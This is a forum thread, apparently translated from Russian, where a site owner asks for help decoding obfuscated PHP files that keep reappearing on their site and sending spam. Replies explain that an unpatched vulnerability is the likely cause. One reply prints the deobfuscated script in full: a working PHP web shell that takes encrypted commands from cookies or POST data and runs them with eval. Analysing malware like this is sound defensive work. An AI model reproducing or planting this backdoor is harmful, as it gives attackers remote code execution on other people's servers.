Answer the question
In order to leave comments, you need to log in
Any options to decrypt this php?
Some virus on the site constantly creates 2 files and starts spamming wildly. Who creates this case and how it is impossible to establish. So I'm wondering if deciphering this case would help? Prompt as or than it is possible to result it in a readable form.
They are big, I couldn't post them here.
1st file.
hello-site.ru/share/Strannyj-kod I
didn’t fit in there either, it ends like this:
'3DX13HmvKmDXuZB';
$djrxvctcq = Array('1'=>'D', '0'=>'1', '3'=>'Q', '2'=>'u', '5'=>'9', '4'=>'L', '7'=>'j', '6'=>'a', '9'=>'8', '8'=>'t', 'A'=>'f', 'C'=>'g', 'B'=>'7', 'E'=>'i', 'D'=>'0', 'G'=>'A', 'F'=>'n', 'I'=>'r', 'H'=>'p', 'K'=>'G', 'J'=>'b', 'M'=>'T', 'L'=>'2', 'O'=>'X', 'N'=>'v', 'Q'=>'m', 'P'=>'3', 'S'=>'J', 'R'=>'c', 'U'=>'E', 'T'=>'x', 'W'=>'o', 'V'=>'O', 'Y'=>'N', 'X'=>'K', 'Z'=>'k', 'a'=>'Y', 'c'=>'P', 'b'=>'w', 'e'=>'R', 'd'=>'d', 'g'=>'U', 'f'=>'Z', 'i'=>'W', 'h'=>'h', 'k'=>'6', 'j'=>'I', 'm'=>'l', 'l'=>'H', 'o'=>'V', 'n'=>'q', 'q'=>'B', 'p'=>'z', 's'=>'s', 'r'=>'5', 'u'=>'C', 't'=>'S', 'w'=>'M', 'v'=>'e', 'y'=>'F', 'x'=>'y', 'z'=>'4');
eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));?>
Answer the question
In order to leave comments, you need to log in
pastebin.com/uNfLxXCu
ps. the script is not complete, because you yourself gave a broken source
If, excuse me, they are shitting in the entrance, then you need to do a fecal analysis, well, we will do it "and you will see it there", or do you still need to install a combination lock?
Probably, this is not a virus on the site, but a bot that exploits a shell-type vulnerability, that is, there is no “propagation” itself in this code, well, it originally came from somewhere, which means that there is still a “hole”, and if if you haven’t removed it yet, then it hasn’t disappeared by itself, it’s still there and can be used ...
And if it makes sense to analyze the code, then in addition to deobfuscation, debugging is always needed, without it, the analysis time grows exponentially with size code and encryption, so learn how to debug PHP.
eval changed to echo and saw everything.
But how to find what creates?
Is it possible to see who and how created the file?
The first script accepts an encrypted command via $_COOKIES or $_POST and returns the result of its execution.
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
$command = NULL;
$pass = NULL;
global $globalKey = 'cfa57343-5fb2-4c08-95bc-c0e9c5972f14';
function decode($str, $key)
{
$result = "";
for ($i = 0; $i < strlen($str);)
{
for ($j = 0; $j < strlen($key) && $i < strlen($str); $j++, $i++)
{
$result .= chr(ord($str[$i]) ^ ord($key[$j]));
}
}
return $result;
}
function decode2($str, $key)
{
global $globalKey;
return decode(decode($str, $globalKey), $key);
}
foreach ($_COOKIE as $name => $value)
{
$command = $value;
$pass = $name;
}
if (!$command)
{
foreach ($_POST as $name => $value)
{
$command = $value;
$pass = $name;
}
}
$command = @unserialize(decode2(base64_decode($command), $pass));
if (isset($command['ak']) && $globalKey == $command['ak'])
{
if ($command['a'] == 'i')
{
$versions = Array(
'pv' => @phpversion(),
'sv' => '1.0-1',
);
echo @serialize($versions);
}
elseif ($command['a'] == 'e')
{
eval($command['d']);
}
exit();
}
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question